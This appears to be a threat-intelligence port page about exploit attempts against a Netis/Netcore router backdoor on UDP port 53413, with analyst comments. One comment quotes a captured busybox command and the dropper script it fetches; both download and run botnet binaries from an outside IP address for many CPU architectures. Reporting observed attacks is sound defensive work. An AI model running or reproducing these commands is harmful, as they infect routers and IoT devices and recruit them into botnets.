Handler on Duty: Didier Stevens
Threat Level: green
Loading...
|
|
URL |
---|
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413) |
Submitted By | Date |
---|---|
Comment | |
2024-07-22 12:13:35 | |
This busybox command was sent to UDP socket: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * 8UsA.sh file tries to load and execute backdoor for 10 different architectures: #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet | |
2016-08-01 00:23:46 | |
The devices causing this traffic seem to be IoT devices (DVR's IPCAM's etc.), possibly part of LizzardStresser or another botnet based on it | |
2016-02-03 10:29:11 | |
This appears to be an attack against netcore routers - udp port 53413. It attempts to run various busybox / shell commands. |
CVE # | Description |
---|